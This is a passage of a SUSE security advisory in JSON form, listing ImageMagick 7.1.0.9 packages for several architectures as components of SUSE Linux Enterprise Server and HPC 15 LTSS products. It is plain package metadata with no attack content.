"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
